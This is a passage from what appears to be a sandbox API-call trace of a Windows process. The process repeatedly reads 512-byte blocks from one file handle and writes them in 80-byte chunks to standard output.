(hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] GetFileType (hFile=0x4c) returned 0x1 [0214.069] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.069] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.070] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.070] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.070] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.070] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.071] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.071] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] GetFileType (hFile=0x4c) returned 0x1 [0214.071] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.071] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] GetFileType (hFile=0x4c) returned 0x1 [0214.072] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.072] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.072] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.072] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.073] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.073] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.073] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.074] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.074] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] GetFileType (hFile=0x4c) returned 0x1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.074] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.074] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.075] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.075] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] GetFileType (hFile=0x4c) returned 0x1 [0214.075] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.075] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.076] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.076] GetFileType (hFile=0x4c) returned 0x1 [0214.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] GetFileType (hFile=0x4c) returned 0x1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae2dc*=0x20, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.077] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae2c8 | out: lpNewFilePointer=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.077] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af148*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af198*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af198*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af1e8*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 0x1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2af238*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae2dc, lpOverlapped=0x0 | out: lpBuffer=0x2af238*, lpNumberOfBytesWritten=0x2ae2dc*=0x50, lpOverlapped=0x0) returned 1 [0214.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.078] GetFileType (hFile=0x4c) returned 